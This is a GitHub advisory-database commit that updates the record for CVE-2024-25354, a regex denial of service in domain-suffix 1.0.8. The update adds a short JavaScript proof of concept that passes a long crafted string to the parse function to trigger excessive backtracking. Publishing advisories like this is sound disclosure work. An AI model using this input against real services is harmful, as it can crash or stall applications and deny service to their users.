Publish GHSA-cqfh-c4c5-c2hg

advisory-database[bot] · advisory-database[bot] · commit 741e62a7a273 · 2025-09-03T15:17:51.000Z
diff --git a/advisories/github-reviewed/2024/03/GHSA-cqfh-c4c5-c2hg/GHSA-cqfh-c4c5-c2hg.json b/advisories/github-reviewed/2024/03/GHSA-cqfh-c4c5-c2hg/GHSA-cqfh-c4c5-c2hg.json
@@ -1,13 +1,13 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-cqfh-c4c5-c2hg",
-  "modified": "2024-08-29T18:02:23Z",
+  "modified": "2025-09-03T15:16:09Z",
   "published": "2024-03-28T00:31:40Z",
   "aliases": [
     "CVE-2024-25354"
   ],
   "summary": "domain-suffix RegEx Denial of Service",
-  "details": "RegEx Denial of Service in domain-suffix 1.0.8 allows attackers to crash the application via crafted input to the parse function.",
+  "details": "RegEx Denial of Service in domain-suffix 1.0.8 allows attackers to crash the application via crafted input to the parse function.\n\n## PoC\n```js\nasync function exploit() {\n   const domainsuffix = require(\\\"domain-suffix\\\");\n   // Crafting a string that will cause excessive backtracking\n   const maliciousInput = \\\"a.\\\".repeat(10000) + \\\"b\\\"; // This will create a long sequence of \\\"a.\\\" followed by \\\"b\\\"\n   const result = await domainsuffix.domainSuffix.parse(maliciousInput);\n}\nawait exploit();\n```",
   "severity": [
     {
       "type": "CVSS_V3",
